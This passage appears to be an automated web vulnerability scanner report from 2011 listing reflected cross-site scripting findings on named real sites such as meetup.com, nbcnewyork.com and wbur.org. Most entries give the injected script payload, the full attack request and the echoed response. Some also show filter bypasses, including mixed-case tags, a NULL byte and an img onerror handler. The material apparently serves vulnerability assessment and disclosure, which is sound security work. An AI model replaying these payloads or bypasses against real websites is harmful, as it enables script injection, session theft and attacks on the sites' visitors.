This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /birddog/widget_map.jsp?zoom=&markers=|47.38,8.54|47.38,8.54|47.38,8.54|45.8,15.97|35.44,139.64|37.27,-76.71|43.47,-80.51|43.47,-80.51|38.91,-77.04|38.9,-77.02|38.91,-77.02|38.91,-77.02|38.91,-77.04|52.26,21.02|52.23,21.02|52.26,21.02|54.7,25.27|54.7,25.27|46.8,7.11|48.22,16.37|48.22,16.37|48.46,-123.29|48.46,-123.29|49.28,-123.04|49.28,-123.11|49.27,-123.1|15.38,100.03|40.11,-88.21|48.4,9.97|62.03,-6.8|32.22,-110.97|63.44,10.4|43.74,-79.36|43.74,-79.36|39.06,-95.68|35.67,139.77|35.67,139.77|45.76,21.23|32.07,34.77|32.07,34.77|32.07,34.77|27.98,-82.34|59.44,24.74|25.02,121.45|-23.53,-46.63|-23.53,-46.63|-23.53,-46.63|-33.87,151.21|-33.87,151.21|-33.87,151.21|59.33,18.07|42.47,-83.29|-37.83,144.96|41.39,-81.44|42.69,23.31|42.69,23.31|42.67,23.44|25.03,121.56|1.3,103.85|1.3,103.85|1.3,103.85|1.3,103.85|1.3,103.84|37.56,126.99|37.56,126.99|37.56,126.99|47.61,-122.33|47.63,-122.33|47.61,-122.33|47.61,-122.33|34.02,-118.5|34.02,-118.5|34.03,-118.5|34.02,-118.5|34.42,-119.71|34.42,-119.71|37.39,-121.9|37.33,-121.89|37.78,-122.42|37.76,-122.42|37.78,-122.42|37.78,-122.42|37.79,-122.4|32.72,-117.17|32.72,-117.17|32.72,-117.17|32.72,-117.17|29.47,-98.53|29.47,-98.53|53.48,-2.31|34.57,135.48|38.65,-90.22|38.58,-90.24|38.58,-121.49|51.93,4.48|41.9,12.48|42.3,-89.13|42.27,-88.97|42.27,-88.99|43.17,-77.6|24.65,46.778e5ed"%3bfe1437ff22d&width=284&height=170.4 HTTP/1.1 Host: www.meetup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.avc.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 21:21:36 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP LAW CUR DEVa TAIa PSAi PSDi OTPi OUR IND UNI NAV DEM STA LOC OTC" X-Meetup-server: app3.int.meetup.com Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Vary: Accept-Encoding,User-Agent Content-Length: 3922 Connection: close
The value of the width request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7894c"><script>alert(1)</script>27df74f1859 was submitted in the width parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /birddog/widget_map.jsp?zoom=&markers=|47.38,8.54|47.38,8.54|47.38,8.54|45.8,15.97|35.44,139.64|37.27,-76.71|43.47,-80.51|43.47,-80.51|38.91,-77.04|38.9,-77.02|38.91,-77.02|38.91,-77.02|38.91,-77.04|52.26,21.02|52.23,21.02|52.26,21.02|54.7,25.27|54.7,25.27|46.8,7.11|48.22,16.37|48.22,16.37|48.46,-123.29|48.46,-123.29|49.28,-123.04|49.28,-123.11|49.27,-123.1|15.38,100.03|40.11,-88.21|48.4,9.97|62.03,-6.8|32.22,-110.97|63.44,10.4|43.74,-79.36|43.74,-79.36|39.06,-95.68|35.67,139.77|35.67,139.77|45.76,21.23|32.07,34.77|32.07,34.77|32.07,34.77|27.98,-82.34|59.44,24.74|25.02,121.45|-23.53,-46.63|-23.53,-46.63|-23.53,-46.63|-33.87,151.21|-33.87,151.21|-33.87,151.21|59.33,18.07|42.47,-83.29|-37.83,144.96|41.39,-81.44|42.69,23.31|42.69,23.31|42.67,23.44|25.03,121.56|1.3,103.85|1.3,103.85|1.3,103.85|1.3,103.85|1.3,103.84|37.56,126.99|37.56,126.99|37.56,126.99|47.61,-122.33|47.63,-122.33|47.61,-122.33|47.61,-122.33|34.02,-118.5|34.02,-118.5|34.03,-118.5|34.02,-118.5|34.42,-119.71|34.42,-119.71|37.39,-121.9|37.33,-121.89|37.78,-122.42|37.76,-122.42|37.78,-122.42|37.78,-122.42|37.79,-122.4|32.72,-117.17|32.72,-117.17|32.72,-117.17|32.72,-117.17|29.47,-98.53|29.47,-98.53|53.48,-2.31|34.57,135.48|38.65,-90.22|38.58,-90.24|38.58,-121.49|51.93,4.48|41.9,12.48|42.3,-89.13|42.27,-88.97|42.27,-88.99|43.17,-77.6|24.65,46.77&width=2847894c"><script>alert(1)</script>27df74f1859&height=170.4 HTTP/1.1 Host: www.meetup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.avc.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 21:21:38 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP LAW CUR DEVa TAIa PSAi PSDi OTPi OUR IND UNI NAV DEM STA LOC OTC" X-Meetup-server: app15.int.meetup.com Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Vary: Accept-Encoding,User-Agent Content-Length: 3814 Connection: close
The value of the width request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34379</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>39d6b2feaea was submitted in the width parameter. This input was echoed as 34379</ScRiPt ><ScRiPt>alert(1)</ScRiPt>39d6b2feaea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /birddog/widget_map.jsp?zoom=&markers=|47.38,8.54|47.38,8.54|47.38,8.54|45.8,15.97|35.44,139.64|37.27,-76.71|43.47,-80.51|43.47,-80.51|38.91,-77.04|38.9,-77.02|38.91,-77.02|38.91,-77.02|38.91,-77.04|52.26,21.02|52.23,21.02|52.26,21.02|54.7,25.27|54.7,25.27|46.8,7.11|48.22,16.37|48.22,16.37|48.46,-123.29|48.46,-123.29|49.28,-123.04|49.28,-123.11|49.27,-123.1|15.38,100.03|40.11,-88.21|48.4,9.97|62.03,-6.8|32.22,-110.97|63.44,10.4|43.74,-79.36|43.74,-79.36|39.06,-95.68|35.67,139.77|35.67,139.77|45.76,21.23|32.07,34.77|32.07,34.77|32.07,34.77|27.98,-82.34|59.44,24.74|25.02,121.45|-23.53,-46.63|-23.53,-46.63|-23.53,-46.63|-33.87,151.21|-33.87,151.21|-33.87,151.21|59.33,18.07|42.47,-83.29|-37.83,144.96|41.39,-81.44|42.69,23.31|42.69,23.31|42.67,23.44|25.03,121.56|1.3,103.85|1.3,103.85|1.3,103.85|1.3,103.85|1.3,103.84|37.56,126.99|37.56,126.99|37.56,126.99|47.61,-122.33|47.63,-122.33|47.61,-122.33|47.61,-122.33|34.02,-118.5|34.02,-118.5|34.03,-118.5|34.02,-118.5|34.42,-119.71|34.42,-119.71|37.39,-121.9|37.33,-121.89|37.78,-122.42|37.76,-122.42|37.78,-122.42|37.78,-122.42|37.79,-122.4|32.72,-117.17|32.72,-117.17|32.72,-117.17|32.72,-117.17|29.47,-98.53|29.47,-98.53|53.48,-2.31|34.57,135.48|38.65,-90.22|38.58,-90.24|38.58,-121.49|51.93,4.48|41.9,12.48|42.3,-89.13|42.27,-88.97|42.27,-88.99|43.17,-77.6|24.65,46.77&width=28434379</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>39d6b2feaea&height=170.4 HTTP/1.1 Host: www.meetup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.avc.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 21:21:42 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP LAW CUR DEVa TAIa PSAi PSDi OTPi OUR IND UNI NAV DEM STA LOC OTC" X-Meetup-server: app0.int.meetup.com Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Vary: Accept-Encoding,User-Agent Content-Length: 3829 Connection: close
The value of the queryString request parameter is copied into the HTML document as plain text between tags. The payload %00e85c7<script>alert(1)</script>b55f6f012d1 was submitted in the queryString parameter. This input was echoed as e85c7<script>alert(1)</script>b55f6f012d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of the spaceKey request parameter is copied into the HTML document as plain text between tags. The payload dfeb7<script>alert(1)</script>5a8a766addf was submitted in the spaceKey parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the spaceKey request parameter is copied into the HTML document as plain text between tags. The payload 56cfd<script>alert(1)</script>fb4a5aaa538 was submitted in the spaceKey parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the spaceKey request parameter is copied into the HTML document as plain text between tags. The payload 130e7<script>alert(1)</script>a81bf6604bf was submitted in the spaceKey parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the zipCode request parameter is copied into the HTML document as plain text between tags. The payload ff03f<script>alert(1)</script>3cd089078b3 was submitted in the zipCode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.357. http://www.nbcnewyork.com/news/local/Helicopter-Crash-East-River-Death-Tourist-Rescue-Victims-Bloomberg--131125518.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32e56"><script>alert(1)</script>8258c1fce7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the keywords request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f872e</script><script>alert(1)</script>10f86ff7943 was submitted in the keywords parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.359. http://www.nbcnewyork.com/weather/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.nbcnewyork.com
Path:
/weather/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37dbd"><script>alert(1)</script>b8508c0bc29 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: Apache Content-Type: text/html;charset=utf-8 X-Server-Name: sj-c14-r8-u31-b6 Vary: User-Agent Vary: Accept-Encoding Date: Wed, 05 Oct 2011 18:22:32 GMT Content-Length: 135007 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraph.org/s ...[SNIP]... <meta property="og:url" content="http://www.nbcnewyork.com/weather/?zipCode=10010&37dbd"><script>alert(1)</script>b8508c0bc29=1"/> ...[SNIP]...
3.360. http://www.nbcnewyork.com/weather/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.nbcnewyork.com
Path:
/weather/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9295"><script>alert(1)</script>24ed694f541 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of the zipCode request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52240'%3balert(1)//87cfb3b5bc was submitted in the zipCode parameter. This input was echoed as 52240';alert(1)//87cfb3b5bc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the zipCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3714b"><script>alert(1)</script>557d8185abf was submitted in the zipCode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload b8cae<script>alert(1)</script>05875156638 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hosted/util/getRemoteDomainCookies.js?callback=__nbcadops_xasis.getRemoteDomainCookiesCallbackb8cae<script>alert(1)</script>05875156638 HTTP/1.1 Host: www.nbcudigitaladops.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.nbcnewyork.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 146 Content-Type: application/javascript ETag: "15f491-44-4aacd3f538254" P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Expires: Wed, 05 Oct 2011 18:19:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 05 Oct 2011 18:19:58 GMT Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 78973<script>alert(1)</script>5912a575408 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af469"><script>alert(1)</script>844413a6c21 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d897e"><script>alert(1)</script>f58afd3d7cc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 327f5"><img%20src%3da%20onerror%3dalert(1)>2c27d50894 was submitted in the REST URL parameter 3. This input was echoed as 327f5"><img src=a onerror=alert(1)>2c27d50894 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the mtb_email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51977"><script>alert(1)</script>a0637be36b4945c93 was submitted in the mtb_email parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 21:20:38 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 17193 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://developers.facebook.com ...[SNIP]... id="mtb_email" type="text" title="This is not publicly shown. Use a valid email address, we'll send you an activation email." class="inputSignup" name="mtb_email" tabindex="20" maxlength="128" value="51977"><script>alert(1)</script>a0637be36b4945c93"> ...[SNIP]...
The value of the mtb_username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e17e"><script>alert(1)</script>2ab94bd8319d5a28b was submitted in the mtb_username parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the referral request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 334b8"><script>alert(1)</script>7efc2c692aa5e214d was submitted in the referral parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a55c</script><script>alert(1)</script>f9140c2b31f was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /arts-calendar/?url=http://www.artsboston.org/web_services/calendar/91/event/detail/4413939902a55c</script><script>alert(1)</script>f9140c2b31f HTTP/1.1 Host: www.wbur.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 ETag: "" Server: Microsoft-IIS/7.0 X-Powered-By: PHP/5.3.6 X-Pingback: http://www.wbur.org/xmlrpc.php Date: Wed, 05 Oct 2011 18:35:48 GMT Connection: close Content-Length: 32347
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... pt type="text/javascript"> $(document).ready(function(){ $("#e_widget_iframe").attr("src", "http://www.artsboston.org/web_services/calendar/91/event/detail/4413939902a55c</script><script>alert(1)</script>f9140c2b31f"); }); </script> ...[SNIP]...
3.372. http://www.wbur.org/content/news/arts-culture [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.wbur.org
Path:
/content/news/arts-culture
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 641a1"><a>50ac5cbcf3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 641a1\"><a>50ac5cbcf3 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content/news/arts-culture?641a1"><a>50ac5cbcf3=1 HTTP/1.1 Host: www.wbur.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 ETag: "" Server: Microsoft-IIS/7.0 X-Powered-By: PHP/5.3.6 X-Pingback: http://www.wbur.org/xmlrpc.php Date: Wed, 05 Oct 2011 18:35:04 GMT Connection: close Content-Length: 31763
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c ...[SNIP]... <a href="/content/news/arts-culture?641a1\"><a>50ac5cbcf3=1/feed" class="sprite rsslink"> ...[SNIP]...
3.373. http://www.wbur.org/content/news/boston [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.wbur.org
Path:
/content/news/boston
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc4b0"><a>c774540cdcd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc4b0\"><a>c774540cdcd in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content/news/boston?bc4b0"><a>c774540cdcd=1 HTTP/1.1 Host: www.wbur.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 ETag: "" Server: Microsoft-IIS/7.0 X-Powered-By: PHP/5.3.6 X-Pingback: http://www.wbur.org/xmlrpc.php Date: Wed, 05 Oct 2011 18:34:49 GMT Connection: close Content-Length: 43351
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c ...[SNIP]... <a href="/content/news/boston?bc4b0\"><a>c774540cdcd=1/feed" class="sprite rsslink"> ...[SNIP]...
3.374. http://www.wbur.org/content/news/economy-business [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.wbur.org
Path:
/content/news/economy-business
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 408f6"><a>b26993f6b2b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 408f6\"><a>b26993f6b2b in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content/news/economy-business?408f6"><a>b26993f6b2b=1 HTTP/1.1 Host: www.wbur.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 ETag: "" Server: Microsoft-IIS/7.0 X-Powered-By: PHP/5.3.6 X-Pingback: http://www.wbur.org/xmlrpc.php Date: Wed, 05 Oct 2011 18:34:57 GMT Connection: close Content-Length: 31795
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c ...[SNIP]... <a href="/content/news/economy-business?408f6\"><a>b26993f6b2b=1/feed" class="sprite rsslink"> ...[SNIP]...
3.375. http://www.wbur.org/content/news/health [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.wbur.org
Path:
/content/news/health
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1366"><a>c70e59c3a95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1366\"><a>c70e59c3a95 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content/news/health?d1366"><a>c70e59c3a95=1 HTTP/1.1 Host: www.wbur.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 ETag: "" Server: Microsoft-IIS/7.0 X-Powered-By: PHP/5.3.6 X-Pingback: http://www.wbur.org/xmlrpc.php Date: Wed, 05 Oct 2011 18:35:01 GMT Connection: close Content-Length: 31714
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c ...[SNIP]... <a href="/content/news/health?d1366\"><a>c70e59c3a95=1/feed" class="sprite rsslink"> ...[SNIP]...
3.376. http://www.wbur.org/content/news/nation [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.wbur.org
Path:
/content/news/nation
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19279"><a>c23b544afe0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19279\"><a>c23b544afe0 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content/news/nation?19279"><a>c23b544afe0=1 HTTP/1.1 Host: www.wbur.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 ETag: "" Server: Microsoft-IIS/7.0 X-Powered-By: PHP/5.3.6 X-Pingback: http://www.wbur.org/xmlrpc.php Date: Wed, 05 Oct 2011 18:34:50 GMT Connection: close Content-Length: 31655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c ...[SNIP]... <a href="/content/news/nation?19279\"><a>c23b544afe0=1/feed" class="sprite rsslink"> ...[SNIP]...
3.377. http://www.wbur.org/content/news/politics [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.wbur.org
Path:
/content/news/politics
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2904c"><a>43dd636b902 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2904c\"><a>43dd636b902 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /content/news/politics?2904c"><a>43dd636b902=1 HTTP/1.1 Host: www.wbur.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 ETag: "" Server: Microsoft-IIS/7.0 X-Powered-By: PHP/5.3.6 X-Pingback: http://www.wbur.org/xmlrpc.php Date: Wed, 05 Oct 2011 18:34:54 GMT Connection: close Content-Length: 31796
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c ...[SNIP]... <a href="/content/news/politics?2904c\"><a>43dd636b902=1/feed" class="sprite rsslink"> ...[SNIP]...
